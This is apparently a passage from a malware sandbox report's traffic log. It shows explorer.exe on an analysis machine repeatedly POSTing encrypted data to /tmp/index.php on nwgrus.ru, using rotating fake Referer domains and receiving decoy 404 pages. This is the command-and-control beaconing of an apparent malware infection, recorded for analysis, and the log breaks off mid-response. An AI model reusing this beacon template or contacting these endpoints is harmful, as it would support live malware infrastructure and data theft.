                                                                    Oct 14, 2024 06:03:03.640578985 CEST250OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 35 1d fc 93
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu5]zus/k?KS9B,p>3&?'<GqAWgzQf?9[nR^J;Cl9jOYC7A!@
                                                                    Oct 14, 2024 06:03:05.159991026 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:04 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.650001125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:05.173413038 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://jkejxmgpctomkc.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 251
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:05.173717022 CEST251OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4d 4c f0 8d
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuML8|429&v?3X/uc;PQXObO9Oe762?=)*V8v:~!q}IcX{ps
                                                                    Oct 14, 2024 06:03:06.773724079 CEST137INHTTP/1.1 200 OK
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:06 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.650002125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:06.783716917 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://doyodlaoiwpyujb.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 210
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:06.783741951 CEST210OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 5e 28 bf 87
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu^(R}F6GXCKN_jW3_NCRX2CT,V{l@bZB97TI9_K
                                                                    Oct 14, 2024 06:03:08.494596004 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:07 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.650003125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:08.503218889 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://foywayqrovd.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 255
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:08.503252983 CEST255OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 76 03 db e5
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuvk8`lb>1*yZb=\BHT8H E3q_Rxi?>tS(D"H:Uf}Hs,7'
                                                                    Oct 14, 2024 06:03:10.116532087 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:09 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.650004125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:10.127156973 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://eekncfsmpbrkmlo.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 338
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:10.127182007 CEST338OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 56 19 fe b9
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuVQjiSam,|/akUV6?IqZL^=l/,s,-CN xlocN[I26)cYMa-fr%1,
                                                                    Oct 14, 2024 06:03:11.620177984 CEST137INHTTP/1.1 200 OK
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:11 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.650005125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:11.631721020 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://clxaxfnyuedfqps.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 363
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:11.631755114 CEST363OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 41 17 b4 98
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuA>Ugbc'qQ1m?*q;<FZtB]`O_.s#A(Yn^ZYcSgA]_pZZaf.@
                                                                    Oct 14, 2024 06:03:13.110871077 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:12 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.650006125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:13.120213985 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://uimdgsgyvhhaem.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 172
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:13.120213985 CEST172OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 6f 41 d5 9f
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuoAAEz:Is0exqoJ+aV3\3'RKRuK6nKC
                                                                    Oct 14, 2024 06:03:14.871304035 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:14 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.650007125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:14.883373976 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://eeyuetrukjpircst.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 249
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:14.883388996 CEST249OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 72 04 f1 ae
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vurtfR6P/qcs20JT7+'r."P`1TSs^n,tA.2n5M|,3{ZE7'RqygU'J
                                                                    Oct 14, 2024 06:03:16.441132069 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:16 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.650008125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:16.449224949 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://ydaciekeaeuaol.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 188
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:16.449242115 CEST188OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 26 48 e8 aa
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu&HA`u:[>%}ce|}>tJ==z#ONF8?7`-VWyM
                                                                    Oct 14, 2024 06:03:18.047068119 CEST137INHTTP/1.1 200 OK
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:17 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.650009125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:18.059562922 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://voyqfwrggnp.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 295
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:18.059576035 CEST295OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 79 19 dc 8c
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuy_$klfu32$$X@{N@T*8{G=e(Y|_Wz4fV|w?}D6%g``v,dm-LFP1
                                                                    Oct 14, 2024 06:03:19.642184973 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:19 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.650010125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:19.653225899 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://blxnotvrjvnu.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 159
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:19.653278112 CEST159OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 42 47 f9 9e
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuBGA_x(a{'<k-I>U);L=~*8`|t]
                                                                    Oct 14, 2024 06:03:21.149692059 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:20 GMT
